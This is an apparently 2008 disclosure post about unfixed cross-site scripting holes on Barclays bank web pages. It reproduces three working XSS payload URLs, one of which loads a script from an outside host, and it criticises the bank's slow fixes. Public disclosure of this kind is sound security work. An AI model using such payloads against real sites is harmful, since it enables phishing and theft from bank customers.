Advertisements

 Barclays XSS vulnerability comes handy for scammers and blackhat hackers

Written by DP

Sunday, 11 May 2008

Update (13/05/07):
One more XSS on www.barclays.co.uk (submitted by TreX):
http://www.barclays.co.uk/insurance/home-insurance/
?campaignCode="><script>alert('XSS')</script>


Mirror:
http://www.xssed.com/mirror/38364/

--
Bank websites which are vulnerable to cross-site scripting are critically susceptible to frauds and this is a well-documented fact!

Strict case management and monitoring of security vulnerabilities should have prevented 100% of site-specific vulnerabilities.

Barclays is one of the largest UK banks and a gold target for scammers hunting the pound notes.
In this case, exploiting trust is an easy game to play for phishers and blackhat hackers.

Barclays web security staff ignore security risks coming from cross-site scripting. An example of this ignorance is another Barclays bank XSS which remains unfixed for over a year:

http://www.newsroom.barclays.co.uk/search/default.asp?searchText=
%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E


To me, this illustrates that they are not valuing highly their customer's privacy and security.

Mirror:
http://www.xssed.com/mirror/6709/

Malicious minds can exploit this XSS vulnerability to infect users with crimeware and steal customer bank accounts, credit card details and other sensitive personal information. They can even request Barclay's customers to donate money for the Myanmar cyclone victims.

Barclays XSS (discovered and submitted by Skyr3x):
http://www.barclays.co.uk/credit-cards/index.htm?TC=
%22%3E%3C/script%3E%3Cscript%3Ealert("XSS");%3C/script%3E


Mirror:
http://www.xssed.com/mirror/38102/

We hope that they remediate this issue as soon as possible!
We suggest to all banks to subscribe their online properties to the XSS early warning mailing list.

Interesting Reads:
"Bank's own developers a much bigger problem than browsers", mhp, Netcraft, 18 Jul 04
"[WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)", Jeremiah Grossman, WhiteHatSec, 23 Jun 06
"You can't Bank on Security", Edward Henning, Jürgen Schmidt, heise Security UK, 20 Sep 06


        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.